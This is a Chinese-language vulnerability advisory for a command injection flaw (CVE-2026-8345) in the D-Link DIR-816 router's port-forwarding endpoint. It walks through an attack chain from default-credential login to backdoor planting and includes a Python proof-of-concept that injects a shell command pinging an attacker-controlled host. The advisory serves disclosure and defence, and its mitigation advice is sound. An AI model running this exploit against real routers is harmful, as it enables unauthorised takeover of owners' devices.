CVE-2026-8345 D-Link DIR-816 命令注入漏洞

漏洞信息

漏洞编号

CVE-2026-8345

漏洞类型

命令注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

D-Link DIR-816

漏洞概述

D-Link DIR-816 无线路由器固件版本 1.10CNB05_R1B011D88210 中存在一个安全漏洞。该问题源于 /goform/singlePortForward 接口下的 sub_445E7C 函数在处理用户输入时缺乏严格的过滤。攻击者可以通过操纵名为 'ip_address' 的参数注入恶意命令，由于该漏洞允许远程利用且无需用户交互，经过身份验证的攻击者可借此在目标设备上执行任意系统命令，从而完全控制设备，影响系统的机密性、完整性和可用性。

技术细节

该漏洞的技术核心在于 D-Link DIR-816 固件中处理单端口转发配置的 CGI 程序。具体受影响的文件路径为 /goform/singlePortForward，其中的关键函数 sub_445E7C 负责解析并应用端口转发规则。在代码实现中，该函数直接提取 HTTP POST 请求中的 'ip_address' 参数值，并将其作为字符串拼接到系统命令中执行（例如通过 system() 或 popen() 函数调用），未对输入内容进行有效的边界检查或特殊字符转义。

这种不安全的编程方式导致了经典的命令注入漏洞。攻击者可以在 'ip_address' 字段中插入 Shell 元字符（如分号 ';'、管道符 '|' 或反引号 '`'）。当后端程序处理该请求时，拼接后的字符串将先执行原本的配置命令，随后执行攻击者注入的恶意指令。根据 CVSS 向量 CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L，攻击需要低权限（PR:L），意味着攻击者通常需要拥有路由器的普通用户或管理员凭据（通过 Web 界面登录），但一旦绕过认证或获取权限，即可在低复杂度下发起攻击，无需用户交互即可通过网络远程触发。

攻击链分析

STEP 1

1. 信息收集

攻击者扫描网络，识别出目标设备为 D-Link DIR-816 路由器，并确定其固件版本为受影响的 1.10CNB05_R1B011D88210。

STEP 2

2. 获取访问权限

攻击者使用默认凭证或暴力破解方式登录路由器的 Web 管理界面（满足 PR:L 要求），获取会话 Cookie。

STEP 3

3. 构造恶意请求

攻击者构造针对 /goform/singlePortForward 的 HTTP POST 请求，在 ip_address 参数中插入包含 Shell 元字符的恶意载荷。

STEP 4

4. 执行注入命令

服务器端 sub_445E7C 函数处理请求，将 ip_address 值拼接到系统命令中执行，触发命令注入，运行攻击者指定的代码（如下载恶意程序或开启 Telnet）。

STEP 5

5. 建立控制

攻击者利用执行的命令获取设备 Shell 权限，进一步植入后门或修改路由配置。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target configuration
target_ip = "192.168.0.1"
target_url = f"http://{target_ip}/goform/singlePortForward"
username = "admin"
password = "admin"

# Attacker's controlled server for verification (e.g., Burp Collaborator or netcat listener)
attacker_server = "192.168.1.100"

# The payload injects a command to ping the attacker's server
# Shell metacharacter ';' is used to chain commands
injection_payload = f"; ping -c 3 {attacker_server}"

# Prepare the data payload
data = {
    "ip_address": injection_payload,
    # Other form fields might be required depending on the page structure
    # "internal_port": "80",
    # "external_port": "8080",
    # "protocol": "tcp"
}

# Create a session to handle authentication
session = requests.Session()

# Step 1: Login (Simulated, actual endpoint may vary)
login_url = f"http://{target_ip}/login.asp"
login_data = {"username": username, "password": password}
try:
    login_response = session.post(login_url, data=login_data, timeout=5)
    if login_response.status_code == 200:
        print("[+] Login successful")
except:
    print("[-] Login failed or endpoint incorrect")

# Step 2: Send Exploit
try:
    response = session.post(target_url, data=data, timeout=5)
    print(f"[+] Exploit sent. Status Code: {response.status_code}")
    print(f"[+] Check {attacker_server} for incoming ping requests to verify RCE.")
except Exception as e:
    print(f"[-] Exploit failed: {e}")

影响范围

D-Link DIR-816 1.10CNB05_R1B011D88210

防御指南

临时缓解措施

如果无法立即升级固件，建议用户禁用路由器的远程 Web 管理功能（Remote Management），防止来自互联网的攻击尝试。同时，通过防火墙规则限制对内部端口 80 和 443 的入站访问，仅允许管理员主机进行连接。此外，应关闭不必要的端口转发服务（UPnP），减少攻击面。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-8345
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-8345
3 Details https://www.cvedetails.com/cve/CVE-2026-8345/
4 VulDB https://vuldb.com/cve/CVE-2026-8345
5 Link https://github.com/lipenghai/iot_bug/blob/main/D-Link/DIR816/2.md
6 Link https://vuldb.com/submit/811379
7 Link https://vuldb.com/vuln/362661
8 Link https://vuldb.com/vuln/362661/cti
9 Link https://www.dlink.com/